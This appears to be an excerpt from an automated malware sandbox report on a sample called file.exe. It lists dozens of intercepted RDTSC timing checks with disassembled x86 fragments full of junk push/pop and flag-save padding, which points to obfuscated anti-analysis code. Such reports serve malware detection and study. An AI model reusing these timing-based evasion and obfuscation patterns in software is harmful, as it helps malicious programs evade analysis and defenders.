                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8028B second address: 4A80291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80291 second address: 4A80295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80295 second address: 4A802BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movzx esi, bx 0x0000000f jmp 00007F5E60CAC695h 0x00000014 popad 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A802BA second address: 4A802D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1661h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A802D7 second address: 4A802DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A802DB second address: 4A802DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A802DF second address: 4A802E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6059E second address: 4A605C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1669h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A605C3 second address: 4A605C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A605C7 second address: 4A605CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A605CB second address: 4A605D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A605D1 second address: 4A60606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5E60BA1660h 0x00000008 pop ecx 0x00000009 mov cx, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5E60BA1668h 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60606 second address: 4A60618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E60CAC68Eh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60618 second address: 4A6061C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8001B second address: 4A80021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80021 second address: 4A80025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80025 second address: 4A80029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80029 second address: 4A80069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edi, 22F2827Ch 0x00000011 pushfd 0x00000012 jmp 00007F5E60BA1665h 0x00000017 sub esi, 2D27A9D6h 0x0000001d jmp 00007F5E60BA1661h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA000F second address: 4AA0015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0015 second address: 4AA0019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0019 second address: 4AA0031 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0031 second address: 4AA0035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0035 second address: 4AA0050 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC697h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0050 second address: 4AA0078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1669h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, 5E49h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0078 second address: 4AA007D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA007D second address: 4AA00E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushfd 0x00000010 jmp 00007F5E60BA1661h 0x00000015 jmp 00007F5E60BA165Bh 0x0000001a popfd 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e jmp 00007F5E60BA1666h 0x00000023 xchg eax, ecx 0x00000024 pushad 0x00000025 mov edx, 59FC2640h 0x0000002a popad 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F5E60BA1660h 0x00000035 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA00E0 second address: 4AA00E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA00E4 second address: 4AA00EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA00EA second address: 4AA01A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 19A3h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ecx 0x0000000b pushad 0x0000000c call 00007F5E60CAC697h 0x00000011 mov bx, cx 0x00000014 pop esi 0x00000015 popad 0x00000016 mov eax, dword ptr [76FA65FCh] 0x0000001b jmp 00007F5E60CAC68Bh 0x00000020 test eax, eax 0x00000022 jmp 00007F5E60CAC696h 0x00000027 je 00007F5ED312FEB2h 0x0000002d pushad 0x0000002e push esi 0x0000002f pushfd 0x00000030 jmp 00007F5E60CAC68Dh 0x00000035 add eax, 50DEC666h 0x0000003b jmp 00007F5E60CAC691h 0x00000040 popfd 0x00000041 pop ecx 0x00000042 pushfd 0x00000043 jmp 00007F5E60CAC691h 0x00000048 jmp 00007F5E60CAC68Bh 0x0000004d popfd 0x0000004e popad 0x0000004f mov ecx, eax 0x00000051 jmp 00007F5E60CAC696h 0x00000056 xor eax, dword ptr [ebp+08h] 0x00000059 pushad 0x0000005a pushad 0x0000005b mov ecx, edi 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA01A9 second address: 4AA01DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 movsx edx, si 0x00000009 pushfd 0x0000000a jmp 00007F5E60BA165Eh 0x0000000f xor al, FFFFFFC8h 0x00000012 jmp 00007F5E60BA165Bh 0x00000017 popfd 0x00000018 popad 0x00000019 popad 0x0000001a and ecx, 1Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA01DB second address: 4AA01DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA01DF second address: 4AA01FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1667h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA01FA second address: 4AA026C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC699h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5E60CAC68Ch 0x00000012 and cl, FFFFFFB8h 0x00000015 jmp 00007F5E60CAC68Bh 0x0000001a popfd 0x0000001b mov ax, 22EFh 0x0000001f popad 0x00000020 leave 0x00000021 jmp 00007F5E60CAC692h 0x00000026 retn 0004h 0x00000029 nop 0x0000002a mov esi, eax 0x0000002c lea eax, dword ptr [ebp-08h] 0x0000002f xor esi, dword ptr [002C2014h] 0x00000035 push eax 0x00000036 push eax 0x00000037 push eax 0x00000038 lea eax, dword ptr [ebp-10h] 0x0000003b push eax 0x0000003c call 00007F5E654CC817h 0x00000041 push FFFFFFFEh 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F5E60CAC697h 0x0000004a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA026C second address: 4AA02D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E60BA165Fh 0x00000009 sub ch, FFFFFF8Eh 0x0000000c jmp 00007F5E60BA1669h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F5E60BA1660h 0x00000018 sbb si, E908h 0x0000001d jmp 00007F5E60BA165Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 pop eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F5E60BA1660h 0x00000030 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA02D6 second address: 4AA02DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA02DA second address: 4AA02E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA02E0 second address: 4AA0365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E60CAC68Ch 0x00000009 sub si, 9E98h 0x0000000e jmp 00007F5E60CAC68Bh 0x00000013 popfd 0x00000014 mov esi, 0AA1AC4Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c ret 0x0000001d nop 0x0000001e push eax 0x0000001f call 00007F5E654CC8C9h 0x00000024 mov edi, edi 0x00000026 jmp 00007F5E60CAC692h 0x0000002b xchg eax, ebp 0x0000002c jmp 00007F5E60CAC690h 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 jmp 00007F5E60CAC68Ch 0x0000003a pushfd 0x0000003b jmp 00007F5E60CAC692h 0x00000040 add ecx, 72829288h 0x00000046 jmp 00007F5E60CAC68Bh 0x0000004b popfd 0x0000004c popad 0x0000004d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0365 second address: 4AA03A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, F22Ah 0x00000007 call 00007F5E60BA165Bh 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 jmp 00007F5E60BA165Fh 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5E60BA1660h 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA03A1 second address: 4AA03A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA03A5 second address: 4AA03AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA03AB second address: 4AA03B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA03B1 second address: 4AA03C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5E60BA165Bh 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5001B second address: 4A50020 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50020 second address: 4A5006A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007F5E60BA165Ch 0x0000000f mov dword ptr [esp], ebp 0x00000012 jmp 00007F5E60BA1660h 0x00000017 mov ebp, esp 0x00000019 jmp 00007F5E60BA1660h 0x0000001e and esp, FFFFFFF8h 0x00000021 pushad 0x00000022 mov edi, eax 0x00000024 popad 0x00000025 xchg eax, ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 movsx edi, ax 0x0000002c popad 0x0000002d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5006A second address: 4A50094 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5E60CAC694h 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50094 second address: 4A500E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E60BA1661h 0x00000008 jmp 00007F5E60BA1660h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ecx 0x00000011 pushad 0x00000012 movsx edi, cx 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 mov bx, si 0x0000001b mov cl, 73h 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F5E60BA1662h 0x00000028 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A500E0 second address: 4A500E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A500E4 second address: 4A500EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A500EA second address: 4A500FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 65h 0x00000005 mov esi, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A500FB second address: 4A500FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A500FF second address: 4A50105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50105 second address: 4A501A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA165Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5E60BA1664h 0x00000013 sub esi, 695463A8h 0x00000019 jmp 00007F5E60BA165Bh 0x0000001e popfd 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F5E60BA1666h 0x00000026 sbb esi, 2FAAD608h 0x0000002c jmp 00007F5E60BA165Bh 0x00000031 popfd 0x00000032 pushfd 0x00000033 jmp 00007F5E60BA1668h 0x00000038 sbb cx, F868h 0x0000003d jmp 00007F5E60BA165Bh 0x00000042 popfd 0x00000043 popad 0x00000044 popad 0x00000045 xchg eax, esi 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 mov si, AFF1h 0x0000004d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A501A1 second address: 4A501CA instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5E60CAC68Eh 0x00000008 xor si, CAC8h 0x0000000d jmp 00007F5E60CAC68Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 mov ebx, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A501CA second address: 4A501D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A501D6 second address: 4A501DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A501DA second address: 4A5021E instructions: 0x00000000 rdtsc 0x00000002 mov di, A90Eh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop esi 0x0000000b pushfd 0x0000000c jmp 00007F5E60BA1661h 0x00000011 adc cl, FFFFFF96h 0x00000014 jmp 00007F5E60BA1661h 0x00000019 popfd 0x0000001a popad 0x0000001b popad 0x0000001c xchg eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5E60BA165Dh 0x00000024 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5021E second address: 4A5022E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E60CAC68Ch 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5022E second address: 4A50259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA165Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5E60BA1665h 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50259 second address: 4A5025F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5025F second address: 4A50263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50263 second address: 4A50288 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F5E60CAC694h 0x0000000e mov dword ptr [esp], edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50288 second address: 4A50309 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov ah, 81h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d test esi, esi 0x0000000f jmp 00007F5E60BA1663h 0x00000014 je 00007F5ED306F9C1h 0x0000001a jmp 00007F5E60BA1666h 0x0000001f cmp dword ptr [esi+08h], DDEEDDEEh 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 call 00007F5E60BA165Dh 0x0000002e pop eax 0x0000002f pushfd 0x00000030 jmp 00007F5E60BA1661h 0x00000035 xor eax, 4ECB9D86h 0x0000003b jmp 00007F5E60BA1661h 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50309 second address: 4A5036A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov edi, 0A01D40Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007F5ED317A99Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F5E60CAC68Eh 0x0000001c and si, E358h 0x00000021 jmp 00007F5E60CAC68Bh 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F5E60CAC698h 0x0000002d add si, EDB8h 0x00000032 jmp 00007F5E60CAC68Bh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5036A second address: 4A50382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E60BA1664h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50382 second address: 4A50395 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov ebx, 4FE83C2Eh 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50395 second address: 4A503E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F5E60BA1665h 0x0000000c and si, D9B6h 0x00000011 jmp 00007F5E60BA1661h 0x00000016 popfd 0x00000017 popad 0x00000018 or edx, dword ptr [ebp+0Ch] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5E60BA1668h 0x00000024 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A503E8 second address: 4A503EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A503EE second address: 4A503FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E60BA165Dh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A503FF second address: 4A50436 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC691h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edx, 61000000h 0x00000011 jmp 00007F5E60CAC68Eh 0x00000016 jne 00007F5ED317A8E4h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50436 second address: 4A5043C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5043C second address: 4A50442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50442 second address: 4A50446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50446 second address: 4A50478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [esi+48h], 00000001h 0x0000000c pushad 0x0000000d mov ch, 16h 0x0000000f mov bl, 9Bh 0x00000011 popad 0x00000012 jne 00007F5ED317A8CFh 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5E60CAC696h 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50478 second address: 4A5047C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5047C second address: 4A50482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
